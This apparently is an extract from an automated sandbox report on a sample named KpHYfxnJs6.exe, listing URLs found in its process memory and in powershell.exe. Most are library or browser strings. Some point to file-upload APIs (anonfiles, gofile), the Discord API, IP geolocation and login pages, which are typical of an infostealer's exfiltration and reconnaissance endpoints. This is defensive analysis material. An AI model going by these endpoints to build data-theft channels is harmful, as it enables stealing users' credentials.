                                                          https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963KpHYfxnJs6.exe, 00000004.00000002.2889989783.00000000078A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            https://peps.python.org/pep-0205/KpHYfxnJs6.exe, 00000004.00000002.2885892588.00000000073C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.2538439375.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2707327914.00000000046F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                http://json.orgKpHYfxnJs6.exe, 00000004.00000002.2885316620.0000000007280000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameKpHYfxnJs6.exe, 00000004.00000002.2883936645.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyKpHYfxnJs6.exe, 00000004.00000003.2616188124.0000000004EA1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2891171316.0000000007930000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484460219.0000000004E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688KpHYfxnJs6.exe, 00000004.00000002.2884004752.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459319200.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://www.ebay.co.uk/KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2538439375.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeKpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerKpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884068871.0000000004DD5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://www.amazon.com/KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      https://contoso.com/Iconpowershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://httpbin.org/KpHYfxnJs6.exe, 00000004.00000003.2678320239.0000000007606000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sKpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlKpHYfxnJs6.exe, 00000004.00000003.2479999836.0000000007545000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479814100.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleKpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016KpHYfxnJs6.exe, 00000004.00000003.2742238801.0000000007B0C000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2891171316.0000000007930000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2742827988.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesKpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://www.ecosia.org/newtab/KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://www.youtube.com/KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000046.00000002.2707327914.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2885316620.0000000007280000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syKpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884068871.0000000004DD5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://MD8.mozilla.org/1/mKpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    https://www.python.org/psf/license/KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C67B000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                      http://ip-api.com/line/?fields=hostingrKpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://bugzilla.moKpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://api.anonfiles.com/uploadrKpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3KpHYfxnJs6.exe, 00000004.00000002.2889989783.00000000078A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2538439375.0000000005126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://google.com/mailKpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://packaging.python.org/specifications/entry-points/KpHYfxnJs6.exe, 00000004.00000002.2894453281.0000000007E10000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2891011051.00000000078F0000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesKpHYfxnJs6.exe, 00000004.00000003.2742238801.0000000007AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyKpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmKpHYfxnJs6.exe, 00000004.00000003.2479999836.0000000007545000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479814100.000000000753E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://www.google.com/KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            https://foss.heptapod.net/pypy/pypy/-/issues/3539KpHYfxnJs6.exe, 00000004.00000002.2889989783.00000000078A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484185809.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.0000000007606000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2745181563.000000000760B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880829085.000000000760D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886692444.0000000007611000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744799637.0000000007604000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678320239.0000000007606000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://google.com/KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.0000000007606000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2745181563.000000000760B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880829085.000000000760D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886692444.0000000007611000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744799637.0000000007604000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678320239.0000000007606000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFKpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://api.gofile.io/getServerrKpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://ocsp.sectigo.com0KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.python.org/download/releases/2.3/mro/.KpHYfxnJs6.exe, 00000004.00000003.2461660455.0000000004E53000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2461744604.0000000004E47000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2461580461.0000000004E47000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2885247505.0000000007240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNKpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://discordapp.com/api/v9/users/KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceKpHYfxnJs6.exe, 00000004.00000002.2884950278.0000000006F80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://ip-api.com/json/?fields=225545rKpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specKpHYfxnJs6.exe, 00000004.00000002.2884004752.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920KpHYfxnJs6.exe, 00000004.00000002.2894453281.0000000007E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17KpHYfxnJs6.exe, 00000004.00000003.2742238801.0000000007B0C000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2742827988.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataKpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884068871.0000000004DD5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://yahoo.com/KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://account.bellmedia.cKpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://login.microsoftonline.comKpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2623954278.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000759F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsKpHYfxnJs6.exe, 00000004.00000002.2891011051.00000000078F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://www.zhihu.com/KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
